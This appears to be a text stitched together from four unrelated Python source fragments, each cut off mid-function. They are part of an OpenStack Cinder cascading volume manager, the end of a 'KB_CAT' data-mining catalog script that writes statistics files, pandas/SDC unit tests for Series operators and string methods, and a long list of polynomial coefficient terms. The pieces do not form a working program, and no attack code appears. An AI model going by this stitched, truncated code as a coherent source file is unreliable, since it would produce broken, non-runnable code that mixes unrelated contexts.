def _get_ccding_volume_id(self, volume):
csd_name = volume._info.get("name", None)
if csd_name is None:
LOG.error(_("Cascade info: csd_name is None!!!. %s"),
volume._info)
return ''
uuid_len = self.VOLUME_UUID_MAX_LEN
if len(csd_name) > (uuid_len+1) and csd_name[-(uuid_len+1)] == '@':
return csd_name[-uuid_len:]
try:
return volume._info['metadata']['logicalVolumeId']
except KeyError:
return ''
def _get_ccding_snapsot_id(self, snapshot):
csd_name = snapshot._info["name"]
uuid_len = self.SNAPSHOT_UUID_MAX_LEN
if len(csd_name) > (uuid_len+1) and csd_name[-(uuid_len+1)] == '@':
return csd_name[-uuid_len:]
try:
return snapshot._info['metadata']['logicalVolumeId']
except KeyError:
return ''
def _gen_ccding_volume_name(self, volume_name, volume_id):
max_len = self.VOLUME_NAME_MAX_LEN - self.VOLUME_UUID_MAX_LEN - 1
if (len(volume_name) <= max_len):
return volume_name + "@" + volume_id
else:
return volume_name[0:max_len] + "@" + volume_id
def _gen_ccding_snapshot_name(self, snapshot_name, snapshot_id):
max_len = self.SNAPSHOT_NAME_MAX_LEN - self.SNAPSHOT_UUID_MAX_LEN - 1
if (len(snapshot_name) <= max_len):
return snapshot_name + "@" + snapshot_id
else:
return snapshot_name[0:max_len] + "@" + snapshot_id
def _get_cinder_cascaded_admin_client(self):
try:
kwargs = {'username': cfg.CONF.cinder_username,
'password': cfg.CONF.cinder_password,
'tenant_id': cfg.CONF.cinder_tenant_id,
'auth_url': cfg.CONF.keystone_auth_url
}
keystoneclient = kc.Client(**kwargs)
cinderclient = cinder_client.Client(
username=cfg.CONF.cinder_username,
auth_url=cfg.CONF.keystone_auth_url,
insecure=True)
cinderclient.client.auth_token = keystoneclient.auth_ref.auth_token
diction = {'project_id': cfg.CONF.cinder_tenant_id}
cinderclient.client.management_url = \
cfg.CONF.cascaded_cinder_url % diction
return cinderclient
except keystone_exception.Unauthorized:
with excutils.save_and_reraise_exception():
LOG.error(_('Token unauthorized failed for keystoneclient '
'constructed when get cascaded admin client'))
except cinder_exception.Unauthorized:
with excutils.save_and_reraise_exception():
LOG.error(_('Token unauthorized failed for cascaded '
'cinderClient constructed'))
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_('Failed to get cinder python client.'))
def _get_cinder_cascaded_user_client(self, context):
try:
ctx_dict = context.to_dict()
cinderclient = cinder_client.Client(
username=ctx_dict.get('user_id'),
auth_url=cfg.CONF.keystone_auth_url,
insecure=True)
cinderclient.client.auth_token = ctx_dict.get('auth_token')
cinderclient.client.management_url = \
cfg.CONF.cascaded_cinder_url % ctx_dict
return cinderclient
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_('Failed to get cinder python client.'))
def _get_image_cascaded(self, context, image_id, cascaded_glance_url):
try:
# direct_url is returned by v2 api
netloc = cfg.CONF.cascading_glance_url
header = 'http://'
if header in cfg.CONF.cascading_glance_url:
netloc = netloc[len(header):]
client = glance.GlanceClientWrapper(
context,
netloc=netloc,
use_ssl=False,
version="2")
image_meta = client.call(context, 'get', image_id)
except Exception:
glance._reraise_translated_image_exception(image_id)
if not self.image_service._is_image_available(context, image_meta):
raise exception.ImageNotFound(image_id=image_id)
LOG.debug(_("cascade ino: image glance get_image_cascaded,"
"cascaded_glance_url:%s"), cascaded_glance_url)
locations = getattr(image_meta, 'locations', None)
LOG.debug(_("cascade ino: image glance get_image_cascaded,"
"locations:%s"), locations)
cascaded_image_id = None
for loc in locations:
image_url = loc.get('url')
LOG.debug(_("cascade ino: image glance get_image_cascaded,"
"image_url:%s"), image_url)
if cascaded_glance_url in image_url:
(cascaded_image_id, glance_netloc, use_ssl) = \
glance._parse_image_ref(image_url)
LOG.debug(_("cascade ino : result :image glance "
"get_image_cascaded,%s") % cascaded_image_id)
break
if cascaded_image_id is None:
raise exception.CinderException(
_("cascade exception: cascaded image for image %s not exist.")
% image_id)
return cascaded_image_id
def _add_to_threadpool(self, func, *args, **kwargs):
self._tp.spawn_n(func, *args, **kwargs)
def init_host(self):
"""Do any initialization that needs to be run if this is a
standalone service.
"""
ctxt = context.get_admin_context()
volumes = self.db.volume_get_all_by_host(ctxt, self.host)
LOG.debug(_("Re-exporting %s volumes"), len(volumes))
LOG.debug(_('Resuming any in progress delete operations'))
for volume in volumes:
if volume['status'] == 'deleting':
LOG.info(_('Resuming delete on volume: %s') % volume['id'])
if CONF.volume_service_inithost_offload:
# Offload all the pending volume delete operations to the
# threadpool to prevent the main volume service thread
| |
ii += 1
# write arch_catal file
arch_catal_file = open(arch_catal, 'w')
ii = 0
while ii < n_rows:
arch_catal_file.write("%.6i %s %.6i %s %.6i %s" % (ii, ' ', mtchx[ii], ' ', mtchy[ii], "\n"))
ii += 1
arch_catal_file.close()
# matrix of statistics
arr_cv = [] # CV array of the Groups and Total
arr_med = [] # means array of the Groups
riga_cv = [] # CV row in arr_cv
arr_col = [] # group temporary array
arr_grsg = [] # input data array (normalized)
arr_grsg_c = [] # copy of arr_grsg (for file out sort)
# input matrix sort in group sequence
ii = 0
ix = 0
while ii < n_rows:
ix += 1
gr1 = str(mtchx[ii])
if mtchx[ii] < 10:
gr1 = '0' + str(mtchx[ii])
sg1 = str(mtchy[ii])
if mtchy[ii] < 10:
sg1 = '0' + str(mtchy[ii])
riga_norm = arr_r[ii]
im = 0
riga_norm1 = []
while im <= m:
riga_norm1.append(str(riga_norm[im]))
im += 1
riga_norm2 = " ".join(riga_norm1)
gr_sg_txt = "G_" + gr1 + "_" + sg1 + " " + str(ix) + " " + riga_norm2
arr_grsg.append(gr_sg_txt)
ii += 1
arr_grsg.sort()
ii = 0
while ii < n_rows:
arr_grsg_c.append(arr_grsg[ii])
ii += 1
# setup of arr_cv matrix
num_gr = 0
gruppo0 = ""
ir = 0
while ir < n_rows:
grsg_key = arr_grsg_c[ir].split()
if not grsg_key[0] == gruppo0:
gruppo0 = grsg_key[0]
num_gr +=1
ic = 1
riga1 = []
riga1.append(grsg_key[0])
while ic <= m + 2: # adding new columns for row mean and n° of records
riga1.append(0.0)
ic += 1
arr_cv.append(riga1) # cv row
ir += 1
riga1 = []
riga1.append("*Means*") # adding new row for cv mean
ic = 1
while ic <= m + 2: # adding new column for row mean and n° of records
riga1.append(0.0)
ic += 1
arr_cv.append(riga1)
def found(x):
ir = 0
while ir < len(arr_cv):
linea_cv = arr_cv[ir]
key_cv = linea_cv[0]
if key_cv == x:
return ir
ir += 1
ir = 0
irx = len(arr_grsg_c)
ic = 3
linea_cv = arr_cv[0]
icx = len(linea_cv)
val_col = []
while ic < icx:
ir = 0
gruppo = ""
val_col = []
while ir < irx:
linea = arr_grsg_c[ir].split()
if linea[0] == gruppo or gruppo == "":
gruppo = linea[0]
val_col.append(float(linea[ic]))
else:
i_gruppo = found(gruppo)
linea_cv = arr_cv[i_gruppo]
media_v = abs(mean(val_col))
if media_v == 0.0:
media_v = 0.0000000001
std_v = sd(val_col)
cv_v = std_v / media_v
linea_cv[ic-2] = cv_v # cv value
linea_cv[len(linea_cv)-1] = len(val_col) # number of records
val_col = []
val_col.append(float(linea[ic]))
gruppo = linea[0]
ir += 1
i_gruppo = found(gruppo)
linea_cv = arr_cv[i_gruppo]
media_v = abs(mean(val_col))
if media_v == 0.0:
media_v = 0.0000000001
std_v = sd(val_col)
cv_v = std_v / media_v
linea_cv[ic-2] = cv_v # cv value
linea_cv[len(linea_cv)-1] = len(val_col) # number of records
ic += 1
ir = 0
irx = len(arr_cv)
linea_cv = arr_cv[0]
icx = len(linea_cv) - 2
ic = 1
num_rec1 = 0
while ir < irx: # rows mean
media_riga = 0.0
ic = 1
num_col1 = 0
linea_cv = arr_cv[ir]
while ic < icx:
media_riga += float(linea_cv[ic])
num_col1 += 1
ic += 1
linea_cv[icx] = media_riga / num_col1
num_rec1 += linea_cv[icx + 1]
ir += 1
ir = 0
ic = 1
while ic < icx: # weighted mean of columns
media_col = 0.0
ir = 0
num_rec1 = 0
while ir < irx - 1:
linea_cv = arr_cv[ir]
media_col = media_col + linea_cv[ic] * linea_cv[icx+1] # linea_cv[icx+1] = number of records
num_rec1 = num_rec1 + linea_cv[icx+1]
ir += 1
linea_cv = arr_cv[irx - 1]
linea_cv[ic] = media_col / num_rec1
ic += 1
# updating mean of the row
linea_cv = arr_cv[irx - 1]
linea_means = linea_cv[1:icx]
media_riga = mean(linea_means)
linea_cv[icx] = media_riga # Total mean
linea_cv[icx + 1] = num_rec1 # n° of records
cv_media_gen_after = str(media_riga)
cv_media_gen_after = cv_media_gen_after[0:6]
# write cv file
testata_cv = testata
testata_cv[0] = "*Groups*"
testata_cv.append("*Mean*")
testata_cv.append("N_recs")
arch_cv_file = open(arch_cv, 'w')
ic = 0
while ic <= icx + 1:
arch_cv_file.write('%s %s ' % (testata_cv[ic], " "*(9-len(testata_cv[ic]))))
ic += 1
arch_cv_file.write('%s' % ('\n'))
ir = 0
while ir < irx:
ic = 0
linea_cv = arr_cv[ir]
while ic <= icx + 1:
if ic == 0:
arch_cv_file.write('%s %s ' % (linea_cv[0], " "))
else:
if ic <= icx:
arch_cv_file.write('%7.4f %s ' % (linea_cv[ic], " "))
else:
arch_cv_file.write('%6i %s ' % (linea_cv[ic], " "))
ic += 1
arch_cv_file.write('%s' % ("\n"))
ir += 1
ic = 0
media_xcv = mean(xcv[1:icx])
while ic <= icx : # print CV input (before catalogue)
if ic == 0:
arch_cv_file.write('%s %s ' % ("*CVinp*", " "))
else:
if ic < icx:
arch_cv_file.write('%7.4f %s ' % (xcv[ic], " "))
else:
arch_cv_file.write('%7.4f %s ' % (media_xcv, " "))
arch_cv_file.write('%6i %s ' % (linea_cv[ic+1], " "))
ic += 1
arch_cv_file.write('%s' % ("\n"))
#=========istruzioni aggiunte <NAME> 29/02/2012======================
#know_index = str(1.0 - float(cv_media_gen_after) / float(str_med_cv_gen))
#know_index = know_index[0:6]
#arch_cv_file.write('%s %s %s' % ('*KIndex* ', know_index, '\n'))
#=========fine istruzioni aggiunte da <NAME> 29/02/2012==============
arch_cv_file.close()
# writing out catalog file
testata_cat1 = []
testata_cat1.append("*Group*")
arch_output_file = open(arch_output, 'w')
ic= 0
while ic < icx:
testata_cat1.append(testata_cat[ic])
ic += 1
ic= 0
while ic < len(testata_cat1):
arch_output_file.write('%s %s ' % (testata_cat1[ic], " "*(15-len(testata_cat1[ic]))))
ic += 1
arch_output_file.write('%s' % ("\n"))
index = 0
while index < len(arr_orig):
riga_orig = arr_orig[index]
ic = 0
while ic < len(riga_orig):
if not(isinstance(riga_orig[ic],str)):
riga_orig[ic] = str(riga_orig[ic])
ic += 1
# place before 0 if gr / sg < 10
gr1 = str(mtchx[index])
if mtchx[index] < 10:
gr1 = '0' + str(mtchx[index])
sg1 = str(mtchy[index])
if mtchy[index] < 10:
sg1 = '0' + str(mtchy[index])
arr_rig0 = "G_" + gr1 + "_" + sg1 + " "*8
arch_output_file.write('%s ' % (arr_rig0))
ic= 0
while ic < len(riga_orig):
arch_output_file.write('%s %s ' % (riga_orig[ic], " "*(15-len(riga_orig[ic]))))
ic += 1
arch_output_file.write('%s' % ("\n"))
index += 1
testata_cat1 = []
testata_cat1.append("*Group*")
testata_cat1.append("*RecNum*")
arch_sort_file = open(arch_sort, 'w')
ic= 0
while ic < icx:
testata_cat1.append(testata_cat[ic])
ic += 1
ic= 0
while ic < len(testata_cat1):
arch_sort_file.write('%s %s ' % (testata_cat1[ic], " "*(15-len(testata_cat1[ic]))))
ic += 1
arch_sort_file.write('%s' % ("\n"))
index = 0
while index < len(arr_grsg_c):
riga_grsg = arr_grsg_c[index].split()
ic = 0
while ic < len(riga_grsg):
val_txt = riga_grsg[ic]
val_txt = val_txt[0:13]
arch_sort_file.write('%s %s ' % (val_txt, " "*(15-len(val_txt))))
ic += 1
if index < len(arr_grsg_c) - 1:
arch_sort_file.write('%s' % ("\n"))
index += 1
arch_sort_file.close()
# writing out catalog and sorted file
arr_outsrt = []
index = 0
while index < len(arr_orig):
riga_sort = []
# place before 0 if gr / sg < 10
gr1 = str(mtchx[index])
if mtchx[index] < 10:
gr1 = '0' + str(mtchx[index])
sg1 = str(mtchy[index])
if mtchy[index] < 10:
sg1 = '0' + str(mtchy[index])
riga_sort.append("G_" + gr1 + "_" + sg1)
ic = 0
riga_orig = arr_orig[index]
while ic < len(riga_orig):
val_riga = riga_orig[ic]
riga_sort.append(val_riga)
ic += 1
arr_outsrt.append(riga_sort)
index += 1
for line in arr_outsrt:
line = "".join(line)
arr_outsrt.sort()
testata_srt = []
testata_srt.append("*Group*")
arch_outsrt_file = open(arch_outsrt, 'w')
ic= 0
while ic < icx:
testata_srt.append(testata_orig[ic])
ic += 1
ic= 0
while ic < len(testata_srt):
arch_outsrt_file.write('%s %s' % (testata_srt[ic], " "*(15-len(testata_srt[ic]))))
ic += 1
arch_outsrt_file.write('%s' % ("\n"))
index = 0
key_gruppo = ""
while index < len(arr_outsrt):
riga_sort = arr_outsrt[index]
index_c = 0
while index_c < len(riga_sort):
if index_c == 0:
if riga_sort[0] != key_gruppo:
# arch_outsrt_file.write('%s ' % ("\n"))
key_gruppo = riga_sort[0]
valore = riga_sort[index_c]
arch_outsrt_file.write('%s %s' % (valore, " "*(15-len(valore))))
index_c += 1
if index < len(arr_grsg_c) - 1:
arch_outsrt_file.write('%s' % ("\n"))
index += 1
arch_outsrt_file.close()
print("###############################################################################")
print("# KB_CAT KNOWLEDGE DISCOVERY IN DATA MINING (CATALOG PROGRAM) #")
print("# by <NAME> (COPYRIGHT MARCH 2011 ALL RIGHTS RESERVED) #")
print("# Language used: PYTHON #")
print("###############################################################################")
arch_log_file = open(arch_log, 'w')
arch_log_file.write("%s %s" % ("############################################################################", "\n"))
arch_log_file.write("%s %s" % ("# KB_CAT KNOWLEDGE DISCOVERY IN DATA MINING (CATALOG PROGRAM) #", "\n"))
arch_log_file.write("%s %s" % ("# by <NAME> (COPYRIGHT MARCH 2011 ALL RIGHTS RESERVED) #", "\n"))
arch_log_file.write("%s %s" % ("# Language used: PYTHON . #", "\n"))
arch_log_file.write("%s %s" % ("############################################################################", "\n"))
arch_log_file.write("%s %s %s" % ("Input File -> ", file_input, "\n"))
arch_log_file.write("%s %s %s" % ("Numer of Groups (3 - 20) -> ", str(gruppi_num), "\n"))
arch_log_file.write("%s %s %s" % ("Normalization (Max, Std, None) -> ", tipo_norm, "\n")) | |
= [valid_ids[i] for i in np.random.randint(0, len(valid_ids), n)]
index2 = [valid_ids[i] for i in np.random.randint(0, len(valid_ids), n)]
A = pd.Series(np.random.ranf(n), index=index1)
B = pd.Series(np.random.ranf(n), index=index2)
pd.testing.assert_series_equal(hpat_func(A, B), test_impl(A, B), check_dtype=False, check_names=False)
@skip_sdc_jit
def test_series_operator_add_str_same_index_default(self):
"""Verifies implementation of Series.operator.add between two string Series
with default indexes and same size"""
def test_impl(A, B):
return A + B
hpat_func = self.jit(test_impl)
A = pd.Series(['a', '', 'ae', 'b', 'cccc', 'oo', None])
B = pd.Series(['b', 'aa', '', 'b', 'o', None, 'oo'])
pd.testing.assert_series_equal(hpat_func(A, B), test_impl(A, B), check_dtype=False, check_names=False)
@skip_parallel
@skip_sdc_jit('Arithmetic operations on Series with non-default indexes are not supported in old-style')
def test_series_operator_add_str_align_index_int(self):
"""Verifies implementation of Series.operator.add between two string Series with non-equal integer indexes"""
def test_impl(A, B):
return A + B
hpat_func = self.jit(test_impl)
np.random.seed(0)
index_A = [0, 1, 1, 2, 3, 3, 3, 4, 6, 8, 9]
index_B = [0, 1, 1, 3, 4, 4, 5, 5, 6, 6, 9]
np.random.shuffle(index_A)
np.random.shuffle(index_B)
data = ['', '', 'aa', 'aa', None, 'ae', 'b', 'ccc', 'cccc', None, 'oo']
A = pd.Series(data, index=index_A)
B = pd.Series(data, index=index_B)
pd.testing.assert_series_equal(hpat_func(A, B), test_impl(A, B), check_dtype=False, check_names=False)
def test_series_operator_add_result_name1(self):
"""Verifies name of the Series resulting from appying Series.operator.add to different arguments"""
def test_impl(A, B):
return A + B
hpat_func = self.jit(test_impl)
n = 7
series_names = ['A', '', None, 'B']
for left_name, right_name in combinations(series_names, 2):
S1 = pd.Series(np.arange(n), name=left_name)
S2 = pd.Series(np.arange(n, 0, -1), name=right_name)
with self.subTest(left_series_name=left_name, right_series_name=right_name):
# check_dtype=False because SDC implementation always returns float64 Series
pd.testing.assert_series_equal(hpat_func(S1, S2), test_impl(S1, S2), check_dtype=False)
# also verify case when second operator is scalar
scalar = 3.0
S1 = pd.Series(np.arange(n), name='A')
pd.testing.assert_series_equal(hpat_func(S1, S2), test_impl(S1, S2), check_dtype=False)
@unittest.expectedFailure
def test_series_operator_add_result_name2(self):
"""Verifies implementation of Series.operator.add differs from Pandas
in returning unnamed Series when both operands are named Series with the same name"""
def test_impl(A, B):
return A + B
hpat_func = self.jit(test_impl)
n = 7
S1 = pd.Series(np.arange(n), name='A')
S2 = pd.Series(np.arange(n, 0, -1), name='A')
result = hpat_func(S1, S2)
result_ref = test_impl(S1, S2)
# check_dtype=False because SDC implementation always returns float64 Series
pd.testing.assert_series_equal(result, result_ref, check_dtype=False)
@unittest.expectedFailure
def test_series_operator_add_series_dtype_promotion(self):
"""Verifies implementation of Series.operator.add differs from Pandas
in dtype of resulting Series that is fixed to float64"""
def test_impl(A, B):
return A + B
hpat_func = self.jit(test_impl)
n = 7
dtypes_to_test = (np.int32, np.int64, np.float32, np.float64)
for dtype_left, dtype_right in combinations(dtypes_to_test, 2):
with self.subTest(left_series_dtype=dtype_left, right_series_dtype=dtype_right):
A = pd.Series(np.array(np.arange(n), dtype=dtype_left))
B = pd.Series(np.array(np.arange(n)**2, dtype=dtype_right))
pd.testing.assert_series_equal(hpat_func(A, B), test_impl(A, B))
@skip_sdc_jit('Old-style implementation of operators doesn\'t support Series indexes')
def test_series_operator_lt_index_mismatch1(self):
"""Verifies correct exception is raised when comparing Series with non equal integer indexes"""
def test_impl(A, B):
return A < B
hpat_func = self.jit(test_impl)
n = 11
np.random.seed(0)
index1 = np.arange(n)
index2 = np.copy(index1)
np.random.shuffle(index2)
A = pd.Series([1, 2, -1, 3, 4, 2, -3, 5, 6, 6, 0], index=index1)
B = pd.Series([3, 2, -2, 1, 4, 1, -5, 6, 6, 3, -1], index=index2)
with self.assertRaises(Exception) as context:
test_impl(A, B)
exception_ref = context.exception
self.assertRaises(type(exception_ref), hpat_func, A, B)
@skip_sdc_jit('Old-style implementation of operators doesn\'t support comparing Series of different lengths')
def test_series_operator_lt_index_mismatch2(self):
"""Verifies correct exception is raised when comparing Series of different size with default indexes"""
def test_impl(A, B):
return A < B
hpat_func = self.jit(test_impl)
A = pd.Series([1, 2, -1, 3, 4, 2])
B = pd.Series([3, 2, -2, 1, 4, 1, -5, 6, 6, 3, -1])
with self.assertRaises(Exception) as context:
test_impl(A, B)
exception_ref = context.exception
self.assertRaises(type(exception_ref), hpat_func, A, B)
@skip_numba_jit('Numba propagates different exception:\n'
'numba.errors.TypingError: Failed in nopython mode pipeline (step: nopython frontend)\n'
'Internal error at <numba.typeinfer.IntrinsicCallConstraint ...\n'
'\'Signature\' object is not iterable')
@skip_sdc_jit('Typing checks not implemented for Series operators in old-style')
def test_series_operator_lt_index_mismatch3(self):
"""Verifies correct exception is raised when comparing two Series with non-comparable indexes"""
def test_impl(A, B):
return A < B
hpat_func = self.jit(test_impl)
S1 = pd.Series([1, 2, -1, 3, 4, 2])
S2 = pd.Series(['a', 'b', '', None, '2', 'ccc'])
with self.assertRaises(TypingError) as raises:
hpat_func(S1, S2)
msg = 'Operator lt(). Not supported for series with not-comparable indexes.'
self.assertIn(msg, str(raises.exception))
@skip_sdc_jit('Comparison operations on Series with non-default indexes are not supported in old-style')
@skip_numba_jit("TODO: find out why pandas aligning series indexes produces Int64Index when common dtype is float\n"
"AssertionError: Series.index are different\n"
"Series.index classes are not equivalent\n"
"[left]: Float64Index([0.0, 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0, 10.0], dtype='float64')\n"
"[right]: Int64Index([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], dtype='int64')\n")
def test_series_operator_lt_index_dtype_promotion(self):
"""Verifies implementation of Series.operator.lt between two numeric Series
with the same numeric indexes of different dtypes"""
def test_impl(A, B):
return A < B
hpat_func = self.jit(test_impl)
n = 7
index_dtypes_to_test = (np.int32, np.int64, np.float32, np.float64)
for dtype_left, dtype_right in combinations(index_dtypes_to_test, 2):
with self.subTest(left_series_dtype=dtype_left, right_series_dtype=dtype_right):
A = pd.Series(np.arange(n), index=np.arange(n, dtype=dtype_left))
B = pd.Series(np.arange(n)**2, index=np.arange(n, dtype=dtype_right))
pd.testing.assert_series_equal(hpat_func(A, B), test_impl(A, B))
@skip_sdc_jit('Comparison operations on Series with non-default indexes are not supported in old-style')
def test_series_operator_lt_index_dtype_promotion_fixme(self):
""" Same as test_series_operator_lt_index_dtype_promotion but with w/a for the problem.
Can be deleted when the latter is fixed """
def test_impl(A, B):
return A < B
hpat_func = self.jit(test_impl)
n = 7
index_dtypes_to_test = (np.int32, np.int64, np.float32, np.float64)
for dtype_left, dtype_right in combinations(index_dtypes_to_test, 2):
# FIXME: skip the sub-test if one of the dtypes is float and the other is integer
if not (np.issubdtype(dtype_left, np.integer) and np.issubdtype(dtype_right, np.integer)
or np.issubdtype(dtype_left, np.float) and np.issubdtype(dtype_right, np.float)):
continue
with self.subTest(left_series_dtype=dtype_left, right_series_dtype=dtype_right):
A = pd.Series(np.arange(n), index=np.arange(n, dtype=dtype_left))
B = pd.Series(np.arange(n)**2, index=np.arange(n, dtype=dtype_right))
pd.testing.assert_series_equal(hpat_func(A, B), test_impl(A, B))
@skip_numba_jit('Numba propagates different exception:\n'
'numba.errors.TypingError: Failed in nopython mode pipeline (step: nopython frontend)\n'
'Internal error at <numba.typeinfer.IntrinsicCallConstraint ...\n'
'\'Signature\' object is not iterable')
@skip_sdc_jit('Typing checks not implemented for Series operators in old-style')
def test_series_operator_lt_unsupported_dtypes(self):
"""Verifies correct exception is raised when comparing two Series with non-comparable dtypes"""
def test_impl(A, B):
return A < B
hpat_func = self.jit(test_impl)
S1 = pd.Series([1, 2, -1, 3, 4, 2])
S2 = pd.Series(['a', 'b', '', None, '2', 'ccc'])
with self.assertRaises(TypingError) as raises:
hpat_func(S1, S2)
msg = 'Operator lt(). Not supported for series with not-comparable data.'
self.assertIn(msg, str(raises.exception))
@skip_sdc_jit
def test_series_operator_lt_str(self):
"""Verifies implementation of Series.operator.lt between two string Series with default indexes"""
def test_impl(A, B):
return A < B
hpat_func = self.jit(test_impl)
A = pd.Series(['a', '', 'ae', 'b', 'cccc', 'oo', None])
B = pd.Series(['b', 'aa', '', 'b', 'o', None, 'oo'])
pd.testing.assert_series_equal(hpat_func(A, B), test_impl(A, B))
@skip_sdc_jit("Series.str.istitle is not supported yet")
def test_series_istitle_str(self):
series = pd.Series(['Cat', 'dog', 'Bird'])
cfunc = self.jit(istitle_usecase)
pd.testing.assert_series_equal(cfunc(series), istitle_usecase(series))
@skip_sdc_jit("Series.str.istitle is not supported yet")
@skip_numba_jit("Not work with None and np.nan")
def test_series_istitle_str_fixme(self):
series = pd.Series(['Cat', 'dog', 'Bird', None, np.nan])
cfunc = self.jit(istitle_usecase)
pd.testing.assert_series_equal(cfunc(series), istitle_usecase(series))
@skip_sdc_jit("Series.str.isspace is not supported yet")
def test_series_isspace_str(self):
series = [['', ' ', ' ', ' '],
['', ' c ', ' b ', ' a '],
['aaaaaa', 'bb', 'c', ' d']
]
cfunc = self.jit(isspace_usecase)
for ser in series:
S = pd.Series(ser)
pd.testing.assert_series_equal(cfunc(S), isspace_usecase(S))
@skip_sdc_jit("Series.str.isalpha is not supported yet")
def test_series_isalpha_str(self):
series = [['leopard', 'Golden Eagle', 'SNAKE', ''],
['Hello world!', 'hello 123', 'mynameisPeter'],
['one', 'one1', '1', '']
]
cfunc = self.jit(isalpha_usecase)
for ser in series:
S = pd.Series(ser)
pd.testing.assert_series_equal(cfunc(S), isalpha_usecase(S))
@skip_sdc_jit("Series.str.islower is not supported yet")
def test_series_islower_str(self):
series = [['leopard', 'Golden Eagle', 'SNAKE', ''],
['Hello world!', 'hello 123', 'mynameisPeter']
]
cfunc = self.jit(islower_usecase)
for ser in series:
S = pd.Series(ser)
pd.testing.assert_series_equal(cfunc(S), islower_usecase(S))
def test_series_lower_str(self):
all_data = [['leopard', None, 'Golden Eagle', np.nan, 'SNAKE', ''],
['Hello world!', np.nan, 'hello 123', None, 'mynameisPeter']
]
cfunc = self.jit(lower_usecase)
for data in all_data:
s = pd.Series(data)
pd.testing.assert_series_equal(cfunc(s), lower_usecase(s))
def test_series_strip_str(self):
s = pd.Series(['1. Ant. ', None, '2. Bee!\n', np.nan, '3. Cat?\t'])
cfunc = self.jit(strip_usecase)
for to_strip in [None, '123.', '.!? \n\t', '123.!? \n\t']:
pd.testing.assert_series_equal(cfunc(s, to_strip), strip_usecase(s, to_strip))
def test_series_lstrip_str(self):
s = pd.Series(['1. Ant. ', None, '2. Bee!\n', np.nan, '3. Cat?\t'])
cfunc = self.jit(lstrip_usecase)
for to_strip in [None, '123.', '.!? \n\t', '123.!? \n\t']:
pd.testing.assert_series_equal(cfunc(s, to_strip), lstrip_usecase(s, to_strip))
def test_series_rstrip_str(self):
s = pd.Series(['1. Ant. ', None, '2. Bee!\n', np.nan, '3. Cat?\t'])
cfunc = self.jit(rstrip_usecase)
for to_strip in [None, '123.', '.!? \n\t', '123.!? \n\t']:
pd.testing.assert_series_equal(cfunc(s, to_strip), rstrip_usecase(s, to_strip))
@skip_sdc_jit("Series.str.isalnum is not supported yet")
def test_series_isalnum_str(self):
| |
+ 1892 * uk_26
+ 4085 * uk_27
+ 9331 * uk_28
+ 688 * uk_29
+ 43 * uk_3
+ 256 * uk_30
+ 704 * uk_31
+ 1520 * uk_32
+ 3472 * uk_33
+ 256 * uk_34
+ 1936 * uk_35
+ 4180 * uk_36
+ 9548 * uk_37
+ 704 * uk_38
+ 9025 * uk_39
+ 16 * uk_4
+ 20615 * uk_40
+ 1520 * uk_41
+ 47089 * uk_42
+ 3472 * uk_43
+ 256 * uk_44
+ 106179944855977 * uk_45
+ 141265316367 * uk_46
+ 96419184187 * uk_47
+ 35876905744 * uk_48
+ 98661490796 * uk_49
+ 44 * uk_5
+ 213019127855 * uk_50
+ 486580534153 * uk_51
+ 35876905744 * uk_52
+ 187944057 * uk_53
+ 128279277 * uk_54
+ 47731824 * uk_55
+ 131262516 * uk_56
+ 283407705 * uk_57
+ 647362863 * uk_58
+ 47731824 * uk_59
+ 95 * uk_6
+ 87555697 * uk_60
+ 32578864 * uk_61
+ 89591876 * uk_62
+ 193437005 * uk_63
+ 441850843 * uk_64
+ 32578864 * uk_65
+ 12122368 * uk_66
+ 33336512 * uk_67
+ 71976560 * uk_68
+ 164409616 * uk_69
+ 217 * uk_7
+ 12122368 * uk_70
+ 91675408 * uk_71
+ 197935540 * uk_72
+ 452126444 * uk_73
+ 33336512 * uk_74
+ 427360825 * uk_75
+ 976182095 * uk_76
+ 71976560 * uk_77
+ 2229805417 * uk_78
+ 164409616 * uk_79
+ 16 * uk_8
+ 12122368 * uk_80
+ 250047 * uk_81
+ 170667 * uk_82
+ 63504 * uk_83
+ 174636 * uk_84
+ 377055 * uk_85
+ 861273 * uk_86
+ 63504 * uk_87
+ 116487 * uk_88
+ 43344 * uk_89
+ 2242306609 * uk_9
+ 119196 * uk_90
+ 257355 * uk_91
+ 587853 * uk_92
+ 43344 * uk_93
+ 16128 * uk_94
+ 44352 * uk_95
+ 95760 * uk_96
+ 218736 * uk_97
+ 16128 * uk_98
+ 121968 * uk_99,
uk_0
+ 47353 * uk_1
+ 2983239 * uk_10
+ 244440 * uk_100
+ 546840 * uk_101
+ 108360 * uk_102
+ 592767 * uk_103
+ 1326087 * uk_104
+ 262773 * uk_105
+ 2966607 * uk_106
+ 587853 * uk_107
+ 116487 * uk_108
+ 4913 * uk_109
+ 805001 * uk_11
+ 12427 * uk_110
+ 11560 * uk_111
+ 28033 * uk_112
+ 62713 * uk_113
+ 12427 * uk_114
+ 31433 * uk_115
+ 29240 * uk_116
+ 70907 * uk_117
+ 158627 * uk_118
+ 31433 * uk_119
+ 2036179 * uk_12
+ 27200 * uk_120
+ 65960 * uk_121
+ 147560 * uk_122
+ 29240 * uk_123
+ 159953 * uk_124
+ 357833 * uk_125
+ 70907 * uk_126
+ 800513 * uk_127
+ 158627 * uk_128
+ 31433 * uk_129
+ 1894120 * uk_13
+ 79507 * uk_130
+ 73960 * uk_131
+ 179353 * uk_132
+ 401233 * uk_133
+ 79507 * uk_134
+ 68800 * uk_135
+ 166840 * uk_136
+ 373240 * uk_137
+ 73960 * uk_138
+ 404587 * uk_139
+ 4593241 * uk_14
+ 905107 * uk_140
+ 179353 * uk_141
+ 2024827 * uk_142
+ 401233 * uk_143
+ 79507 * uk_144
+ 64000 * uk_145
+ 155200 * uk_146
+ 347200 * uk_147
+ 68800 * uk_148
+ 376360 * uk_149
+ 10275601 * uk_15
+ 841960 * uk_150
+ 166840 * uk_151
+ 1883560 * uk_152
+ 373240 * uk_153
+ 73960 * uk_154
+ 912673 * uk_155
+ 2041753 * uk_156
+ 404587 * uk_157
+ 4567633 * uk_158
+ 905107 * uk_159
+ 2036179 * uk_16
+ 179353 * uk_160
+ 10218313 * uk_161
+ 2024827 * uk_162
+ 401233 * uk_163
+ 79507 * uk_164
+ 3969 * uk_17
+ 1071 * uk_18
+ 2709 * uk_19
+ 63 * uk_2
+ 2520 * uk_20
+ 6111 * uk_21
+ 13671 * uk_22
+ 2709 * uk_23
+ 289 * uk_24
+ 731 * uk_25
+ 680 * uk_26
